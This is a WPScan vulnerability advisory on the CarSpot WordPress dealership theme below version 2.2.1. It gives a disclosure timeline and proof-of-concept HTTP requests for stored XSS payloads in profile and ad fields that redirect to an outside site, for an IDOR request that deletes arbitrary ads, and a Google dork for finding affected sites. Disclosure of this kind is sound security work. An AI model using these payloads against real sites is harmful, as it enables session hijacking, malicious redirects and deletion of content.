CarSpot < 2.2.1 - Multiple Vulnerabilities



Description
Multiple vulnerabilities was discovered in the «CarSpot – Dealership Wordpress Classified Theme», tested version — v2.2.0:

- Authenticated Persistent XSS -> Registration Form/User Profile
- Authenticated Persistent XSS -> Ad Post
- IDOR leading to arbitrary deletion of ads

Edit (WPScanTeam):
January 17th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
January 23rd, 2020 - v2.2.1 released, but issues still present in the demo.
January 24th, 2020 - Envato Contacted again.
January 27th, 2020 - Demo updated to 2.2.1 fixing the issue for new posts/ads but data from previous ones is still not encoded/escaped when output.
Proof of Concept
----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/
Demo Ad (greetzfromm0ze/asdasd): https://carspot.scriptsbundle.com/?post_type=ad_post&p=3886
Google Dork: /wp-content/themes/carspot/


----[]- Persistent XSS -> Registration Form/User Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input field: «Mobile Number».

Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_

action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno


----[]- Persistent XSS -> Ad Post -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».

Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_

action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update=


----[]- IDOR: -[]----
Delete any post/page/ad:

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_

action=sb_remove_ad&ad_id=XXXX

Where:
ad_id=XXXX - page/post/ad unique WordPress ID, can be discovered as a page class for <body> tag.


Response:

HTTP/1.1 200 OK
...

1|Ad removed successfully.

Affects Theme

fixed in version 2.2.1

References

URL https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 3704
Verified No
WPVDB ID 10047

Timeline

Publicly Published 2020-01-27 (25 days ago)
Added 2020-01-27 (24 days ago)
Last Updated 2020-02-10 (10 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin